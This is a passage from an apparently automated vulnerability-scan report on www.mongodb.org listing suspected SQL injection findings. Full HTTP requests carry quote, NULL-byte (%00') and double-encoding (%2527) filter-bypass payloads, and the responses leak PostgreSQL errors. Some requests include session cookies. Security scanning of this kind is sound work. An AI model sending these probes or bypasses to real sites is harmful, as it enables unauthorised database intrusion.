Date: Wed, 05 Oct 2011 20:50:39 GMT
X-xgen-cache: yes
X-Cache-Info: caching
Content-Length: 2285

<html>
<head>
   <link rel="stylesheet" type="text/css" href="/styles/main-action.css" />
   <link rel="stylesheet" type="text/css" href="/includes/css/master.css" />
   <link rel="stylesheet" type="text/cs
...[SNIP]...

1.31. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:43 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.32. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles'/confluence.macros.profile:profile-macro-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:44 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.33. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:comments/confluence.web.resources:comments.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:44 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.34. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:comments'/confluence.web.resources:comments.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:46 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.35. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:09 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.36. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch'/confluence.web.resources:contentnamesearch.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:10 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.37. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:12 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.38. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles'/confluence.web.resources:master-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:13 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.39. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css?media=print HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.mongodb.org/dosearchsite.action?queryString=xss&where=DOCS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0; JSESSIONID=ECAABD73E2AD3E5DC62FD99815D51753

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:45:57 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.40. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles'/confluence.web.resources:print-styles.css?media=print HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.mongodb.org/dosearchsite.action?queryString=xss&where=DOCS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0; JSESSIONID=ECAABD73E2AD3E5DC62FD99815D51753

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:45:59 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.41. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch'/confluence.web.resources:userlink/confluence.web.resources:userlink.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:17 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.42. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink'/confluence.web.resources:userlink.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:19 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.43. http://www.mongodb.org/s/1627/3/136/_/styles/colors.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/136/_/styles/colors.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/136/_/styles/colors.css?spaceKey=DOCS%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:28 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.44. http://www.mongodb.org/s/1627/3/136/_/styles/combined.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/136/_/styles/combined.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/136/_/styles/combined.css?spaceKey=DOCS%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2011 20:50:26 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00
   org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)
...[SNIP]...

1.45. http://www.mongodb.org/s/1627/3/136/_/styles/custom.css [spaceKey parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/136/_/styles/custom.css

Issue detail

The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s/1627/3/136/_/styles/custom.css?spaceKey=DOCS%00' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:28 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00<br>
...[SNIP]...

1.46. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mongodb.org
Path:   /s/1627/3/3/_/styles/colors.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

